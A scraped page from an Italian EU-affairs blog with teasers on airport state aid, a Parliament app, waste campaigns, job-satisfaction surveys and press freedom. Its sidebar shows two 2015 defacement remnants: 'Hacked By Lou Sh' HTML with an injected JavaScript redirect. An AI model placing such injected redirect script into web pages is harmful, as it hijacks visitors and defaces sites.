EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Maggio 2014
it

Dopo aver appurato la compatibilità con la normativa per il conferimento degli aiuti di Stato, la Commissione ha concesso 12,7 milioni di euro a Villafranca Spa, la società che gestisce gli aeroporti italiani di Verona e Brescia. Gli aiuti saranno utilizzati per migliorare la mobilità dei cittadini modernizzando i terminal, estendendo la zona di stazionamento degli aerei, valorizzando le piste e i sistemi di sicurezza.

I fondi statali destinati ai due aeroporti italiani erano stati concessi nel 2012, violando l’obbligo per gli Stati membri di notificare alla Commissione europea gli aiuti di Stato prima di concederli. Tale violazione aveva causato il blocco del capitale, sussistendo anche il dubbio di presunta (...)

it

In vista delle prossime elezioni europee del 22-25 maggio, il Parlamento europeo lancia la sua prima app per iPad e tablet Android scaricabile gratuitamente dal sito www.boxyourep.eu.

Allo scopo di coinvolgere i cittadini nella politica europea, l’applicazione contiene una serie di “scatole” organizzate per tema che permetteranno agli utenti sia di leggere come l’Aula di Strasburgo ha legiferato negli ultimi cinque anni, sia di conoscere i progetti del prossimo quinquennio su (...)

it

Ogni anno le tonnellate di rifiuti aumentano a dismisura: gettati incautamente sulle strade, sulle spiagge, nelle foreste, negli oceani e nelle zone verdi d’Europa. “Ripuliamo l’Europa” è la campagna di sensibilizzazione del progetto europeo “Settimana europea per la riduzione dei rifiuti” che vuole promuovere le azioni virtuose dei cittadini e diffondere le buone pratiche nella gestione dei rifiuti per un mondo più pulito.

“Ripuliamo l’Europa” non è la prima iniziativa europea messa in atto per fronteggiare il problema dei rifiuti: già in passato ne sono state svolte altre, ma questa darà l’opportunità di riunirle in un unico evento che si terrà il prossimo 10 maggio in tutta Europa. L’obiettivo è quello di coinvolgere (...)

it

Il 24 aprile sono stati pubblicati i dati emersi dall’indagine Eurobarometro sulla qualità del lavoro in Ue. Dalla ricerca è emersa una grande disparità del livello di soddisfazione lavorativa tra i cittadini dei 28 Stati membri: si passa dal 94% dei lavoratori intervistati in Danimarca che si ritengono soddisfatti della qualità del proprio lavoro, al 16% registrato in Grecia, grado più basso di soddisfazione a livello nazionale.

La situazione evidenziata dall’Eurobarometro, dunque, è disomogenea. Infatti, nonostante la maggioranza dei lavoratori europei sia soddisfatta del proprio impiego, esistono notevoli differenze all’interno degli Stati membri: se da una parte vi sono paesi virtuosi, in cui la qualità lavorativa è (...)

it

Lo scorso 3 maggio si è celebrata la Giornata mondiale per la libertà di stampa e un’attenzione particolare è stata riservata al grande aiuto destinato dal Parlamento europeo alla difesa dei diritti e delle libertà dei giornalisti: gli 800.000 euro stanziati dall’ Ue, infatti, serviranno per finanziare quattro progetti speciali avviati ad inizio anno, atti a difendere la libertà di espressione e opinione, sancita nella Dichiarazione universale dei diritti dell’uomo, e a sottolineare il ruolo dei media come strumenti principali per salvaguardare la democrazia.

La Giornata mondiale per la libertà di stampa nasce nel dicembre 1993 per volontà dell’Assemblea generale delle Nazioni Unite a seguito di una Raccomandazione adottata in occasione della ventiseiesima sessione della Conferenza generale dell’UNESCO nel 1991. Da allora, ogni anno, le Nazioni Unite e (...)

it

E’ la dodicesima volta dal 1958 che l’Italia assolve a questo incarico ma questo semestre sarà particolarmente importante e delicato: durante la Presidenza italiana, infatti, vi sarà innanzitutto l’insediamento della nuova Commissione e la nomina del suo nuovo Presidente, saranno rinnovati gli incarichi di Presidente del Consiglio europeo e l’Alto Rappresentante per la politica estera e la sicurezza comune.

Il governo italiano ha già presentato alla fine del 2013 una prima versione del suo programma ma durante le prossime settimane si metterà a punto la macchina organizzativa del Semestre. Il programma si articolerà nell’ambito di tre grandi blocchi tematici: • Europa della crescita, in cui rientrano (...)

it

Il nostro pianeta come sappiamo è sempre più oggetto di consistenti catastrofi a causa dei suoi rapidi mutamenti climatici. Il 15 maggio 2013, la Commissione europea ha lanciato il Centro di coordinamento di risposta all’emergenza con lo scopo di garantire una reazione più dinamica alle catastrofi e per aiutare a fronteggiarle in maniera adeguata attraverso un’idonea preparazione.

Nel suo primo anno di attività, l’ERCC ha registrato ben 35 azioni di soccorso in catastrofi naturali. Questo ha significato non solo una risposta rapida ed efficace ma anche un coordinamento interno ed esterno all’Europa. Ma nello specifico dove ha portato il suo aiuto? Un caso per tutti è stato (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France